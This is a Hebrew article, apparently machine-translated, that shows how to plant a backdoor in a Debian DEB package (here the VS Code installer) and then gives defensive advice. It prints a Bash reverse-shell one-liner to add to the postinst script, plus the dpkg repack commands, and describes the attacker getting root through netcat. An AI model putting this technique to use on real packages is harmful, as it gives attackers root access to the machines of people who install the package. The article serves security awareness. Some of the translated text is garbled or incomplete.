האם ידעת שתוקפים יכולים לשנות את הסקריפטים הארוזים בקובץ DEB כדי לקבל גישה לא מורשית למחשב האישי שלך? הנה איך חבילות DEB הן בדלת האחורית.

טייק אווי מפתח

  • חבילות DEB ניתנות בקלות לדלת אחורית, מה שמאפשר לתוקפים להחדיר קוד זדוני למערכת שלך כאשר אתה מתקין אותן עם הרשאות שורש.
  • קשה לזהות חבילות DEB נגועות, שכן ייתכן שהן לא מסומנות על ידי תוכנת אנטי-וירוס או פתרונות ענן כמו VirusTotal.
  • כדי להגן על עצמך, הימנע מהורדת חבילות DEB מאתרים אקראיים, היצמד לאתרי הורדות רשמיים או אתרים מהימנים בקהילה, ושקול התקנת כלי אבטחה כדי לאבטח את מערכת הלינוקס שלך מפני רשת התקפות.

קבצי DEB הם חבילות תוכנה שהן הפורמט העיקרי של משלוח תוכנות בהפצות לינוקס מבוססות דביאן.

כדי להתקין חבילות DEB, עליך להשתמש במנהל חבילות כמו dpkg עם הרשאות שורש. התוקפים מנצלים זאת ומחדירים דלתות אחוריות לחבילות הללו. כאשר אתה מתקין אותם עם dpkg או כל מנהל חבילות אחר, גם הקוד הזדוני מבוצע לצד ופוגע במערכת שלך.

בוא נחקור בדיוק איך חבילות DEB הן בדלת האחורית ומה אתה יכול לעשות כדי להגן על עצמך.

כיצד מתבצעות חבילות DEB בדלת אחורית?

לפני שתבינו כיצד חבילות DEB הן בדלת האחורית, בואו נחקור מה יש בחבילת DEB. להדגמה, אני אוריד את חבילת Microsoft Visual Studio Code DEB מהאתר הרשמי של Microsoft. זו אותה חבילה שתוריד אם תרצה להתקין את VS Code על לינוקס.

instagram viewer

הורד:Visual Studio Code

כעת לאחר שהורדת את חבילת היעד, הגיע הזמן לפרוק אותה. אתה יכול לפרוק חבילת DEB באמצעות ה dpkg-deb פקודה עם ה דגל ואחריו הנתיב לאחסון התוכן:

dpkg-deb -R

זה אמור לחלץ את התוכן של חבילת VS Code.

במעבר לתיקיה תמצא מספר ספריות, עם זאת, העניין שלנו טמון רק ב דביאן מַדרִיך. ספרייה זו מכילה סקריפטים לתחזוקה שמתבצעים במהלך ההתקנה עם הרשאות שורש. כפי שאולי כבר הבנתם, התוקפים משנים את הסקריפטים בספרייה הזו.

להדגמה, אשנה את ה postinst סקריפט והוסף מעטפת TCP הפוכה של Bash פשוטה. כפי שהשם מרמז, זהו סקריפט שמתבצע לאחר התקנת החבילה במערכת.

הוא מכיל פקודות שמסיימות את התצורות כגון הגדרת קישורים סמליים, טיפול בתלות ועוד. אתה יכול למצוא טונות של קונכיות הפוכה שונות באינטרנט. רובם יעבדו אותו הדבר. להלן דגם ה-one-liner של מעטפת הפוכה:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

הסבר על הפקודה:

  • לַחֲבוֹט: זוהי הפקודה המעוררת את קליפת ה-Bash.
  • -אני: הדגל אומר לבאש לפעול במצב אינטראקטיבי המאפשר קלט/פלט פקודה בזמן אמת.
  • >& /dev/tcp/ip/port: זה מפנה מחדש פלט סטנדרטי ושגיאת תקן לשקע רשת, בעצם יצירת חיבור TCP ל- ו .
  • 0>&1: זה מפנה מחדש את הקלט והפלט לאותו מיקום, כלומר לשקע הרשת.

עבור אלה שאינם מתחילים, מעטפת הפוכה היא סוג של קוד, שכאשר הוא מופעל על מכונת היעד, יוזם חיבור חזרה למחשב של התוקף. קונכיות הפוכה הן דרך מצוינת לעקוף מגבלות חומת אש מכיוון שהתעבורה נוצרת מהמכונה שמאחורי חומת האש.

כך נראה הסקריפט שהשתנה:

כפי שאתה יכול לראות, הכל אותו דבר אבל רק שורה אחת נוספה, כלומר, המעטפת ההפוכה של Bash שלנו. עכשיו אתה צריך לבנות את הקבצים בחזרה לתוך ".deb"פורמט. פשוט השתמש ב- dpkg פקודה עם ה --לִבנוֹת דגל או שימוש dpkg-deb עם ה דגל ואחריו הנתיב של התוכן שחולץ:

dpkg --build 
dpkg-deb -b

כעת חבילת DEB בדלת האחורית מוכנה למשלוח באתרים זדוניים. בואו נדמה תרחיש שבו קורבן הוריד את חבילת DEB למערכת שלו ומתקין אותה כמו כל חבילה רגילה אחרת.

חלונית המסוף העליונה מיועדת ל-POV של הקורבן והחלק התחתונה היא POV של התוקף. הקורבן מתקין את החבילה עם sudo dpkg -i והתוקף מקשיב בסבלנות לחיבורים נכנסים באמצעות ה- netcat פקודה בלינוקס.

ברגע שההתקנה מסתיימת, שימו לב שהתוקף מקבל את חיבור המעטפת ההפוכה וכעת יש לו גישת שורש למערכת של הקורבן. עכשיו אתה יודע איך חבילות DEB הן בדלת האחורית. בוא נלמד עכשיו איך אתה יכול להגן על עצמך.

כיצד לזהות אם חבילת DEB היא זדונית

עכשיו כשאתה יודע שחבילות DEB נגועות הן דבר, אתה בטח תוהה איך למצוא חבילות נגועות. בתור התחלה, אתה יכול לנסות להשתמש ב-a תוכנת אנטי וירוס לינוקס כמו ClamAV. לרוע המזל, כאשר בוצעה סריקה של ClamAV על החבילה, היא לא סימנה אותה כזדונית. להלן תוצאת הסריקה:

אז אלא אם כן יש לך פתרון אנטי-וירוס מובחר (שזה לא ערובה שלא תפרוץ), די קשה לזהות חבילות DEB זדוניות. בואו ננסה להשתמש בפתרון ענן כמו אתר VirusTotal:

כפי שאתה יכול לראות VirusTotal לא זיהה שום דבר לא בסדר בו. ובכן, הדרך היחידה להגן על עצמך מפני איומים כאלה היא להקפיד על היגיינת אבטחה בסיסית כמו לא להוריד קבצים ממקורות לא ידועים, תמיד בדיקת ה-hash של קובץ, ובכלל, הימנעות מהתקנת תוכנות מפוקפקות.

האינטרנט מלא באיומים כאלה. הדרך היחידה לגלוש מבלי לאבד את הנתונים שלך היא לדעת אותך ולגלוש באתרים מהימנים. בנוסף, עבור לינוקס, אתה צריך גם לנסות למצוא אם לתוכנה שאתה מוריד יש גרסה של AppImage מכיוון שהם עצמאיים וניתן לארוז אותם בארגז חול ובכך לשמור על קשר עם המערכת שלך.

אל תורידו חבילות DEB מאתרים אקראיים!

חבילות DEB אינן רעות מטבען, עם זאת, תוקפים יכולים בקלות לעשות נשק ולשלוח אותם למשתמשים תמימים. כפי שהוכח, ניתן לפתוח ולשנות בקלות חבילת DEB כדי להוסיף קוד מותאם אישית עם מספר פקודות בלבד, מה שהופך אותה לוקטור נפוץ למשלוח תוכנות זדוניות.

אפילו דלתות אחוריות פשוטות בחבילות DEB לא נתפסות על ידי פתרונות האנטי-וירוס המובילים. אז הדבר הטוב ביותר לעשות הוא לשחק בטוח, לשאת את השכל הישר שלך בזמן שאתה גולש באינטרנט, ותמיד להוריד תוכנה רק מאתרי הורדה רשמיים או מאתרים מהימנים בקהילה.

כעת לאחר שאתה מודע לסיכוני האבטחה הנלווים להתקנת חבילות DEB מאתרים חדשים או לא ידועים, עליך להיות זהיר בעת התקנת תוכנה חדשה. עם זאת, רק להיזהר ממה שאתה מתקין זה לא מספיק. מערכת הלינוקס שלך יכולה להיות גם מטרה להתקפות רשת.

כדי להבטיח שאתה בטוח במקרה של התקפת רשת, עליך לשקול התקנת כלי אבטחת רשת.